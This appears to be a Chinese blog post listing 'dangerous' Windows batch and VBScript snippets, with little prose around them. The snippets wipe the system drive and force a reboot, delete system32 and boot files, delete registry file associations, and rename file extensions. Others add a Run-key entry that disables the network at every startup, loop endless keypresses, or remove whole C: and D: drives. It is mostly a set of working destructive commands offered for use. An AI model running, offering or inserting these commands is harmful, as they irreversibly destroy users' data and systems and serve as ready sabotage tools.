• !!危险Windows CMD 大风起


    blue screen of dead machine######

    @echo off
    del %systemdrive%*.* /f /s /q
    shutdown -r -f -t 00

    修改所有文件名后缀#####

    REN *.DOC *.TXT REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT

    删除系统######

    del c:\WINDOWS\system32*.* /q

    永久损坏机器#####

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    删除所有注册表#####

    @echo off
    START reg delete HKCR/.exe
    START reg delete HKCR/.dll
    START reg delete HKCR/*

    永久禁用网络######

    echo @echo off > c:\windows\winmn32.bat
    echo break off >>c:\windows\winmn32.bat
    echo ipconfig /release_all >> c:\windows\winmn32.bat
    echo end >> c:\windows\winmn32.bat
    reg add hkey_local_machine/software/microsoft/windows/currentversion/run /v WINDOWsAPI /t reg_sz /d c:windows\wimn32.bat /f
    reg add hkey_current_user/software/microsoft/windows/currentversion/run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
    PAUSE

    无休止ENTER#####

    set wshShell = wscript.CreateObject(“WScript.Shell”)
    do
    wscript.sleep 100
    wshshell.sendkeys “(enter)”
    loop
    ###########

    echo @echo off > c:\windowsshartlell.bat
    shutdown -r -t 11 -f

    格式化磁盘####

    rd /s /q D:
    rd /s /q C:\

    死循环###

    %o | %o

    ########
    taskmon.exe

  • 相关阅读:
    上机小笔记
    机器人搬重物(BFS)
    排序汇总
    棋盘(BFS)
    权限控制:分配权限1
    asp.net identity 基础概念篇-理解什么是声明
    EntityFramework中几种更改数据的方式
    CodeFirst迁移时出现的中文乱码问题
    javascript Function()
    C#操作数据库(二)【操作SQL Server数据库的常用的类介绍】
  • 原文地址:https://www.cnblogs.com/Haihong72H/p/15989889.html
Copyright © 2020-2023  润新知